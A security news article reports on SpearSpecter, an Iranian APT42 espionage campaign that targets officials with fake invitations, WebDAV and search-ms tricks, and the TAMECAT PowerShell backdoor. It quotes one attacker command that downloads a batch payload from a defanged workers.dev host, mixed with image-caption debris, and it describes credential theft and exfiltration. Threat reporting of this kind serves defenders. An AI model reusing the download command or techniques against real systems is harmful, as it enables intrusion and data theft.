A dangerous espionage campaign is targeting senior government and defense officials worldwide. Iranian hackers are using fake conference invitations and meeting requests to trick victims.
The attackers spend weeks building trust before striking. They reach out through WhatsApp to make their messages look legitimate.
This campaign, known as SpearSpecter, combines patience with powerful malware to steal sensitive information.
The attackers work for Iran’s Islamic Revolutionary Guard Corps Intelligence Organization. They operate under several names including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.
Their main goal is stealing sensitive information from people with access to government secrets. What makes this group dangerous is how they adapt their methods and use both credential theft and long-term spying tools.
Israel National Digital Agency security researchers identified the malware and uncovered the operation scope. The campaign has been running for months with no signs of stopping.
The attackers target both officials and family members to increase pressure and find new entry points.
Advanced Infection Through WebDAV and PowerShell
The infection starts when victims receive a link claiming to be an important document for a meeting. When clicked, the link redirects to a file on OneDrive.
Attackers abuse the Windows search-ms protocol to trigger a popup asking users to open Windows Explorer. If victims accept, their computer connects to the attacker’s WebDAV server.
The WebDAV server displays what looks like a PDF file, but it’s actually a malicious shortcut. When opened, this shortcut runs hidden commands that download a batch script from Cloudflare Workers using the following command:-
cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%.webp "Iranian SpearSpecter Attacking High-Value Officials Using Personalized Social Engineering Tactics 3")
The script loads TAMECAT, a sophisticated PowerShell-based backdoor that operates entirely in memory. TAMECAT uses AES-256 encryption to communicate with command servers through multiple channels including web traffic, Telegram, and Discord.
TAMECAT collects browser passwords by launching Microsoft Edge with remote debugging and suspending Chrome processes. It captures screenshots every fifteen seconds and searches for documents. All stolen data gets split into five megabyte chunks and uploaded.
.webp "Iranian SpearSpecter Attacking High-Value Officials Using Personalized Social Engineering Tactics 4")
To survive restarts, TAMECAT creates registry entries that run batch files at login. The malware avoids detection by using trusted Windows programs. Researchers found attackers using Cloudflare Workers for command infrastructure.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
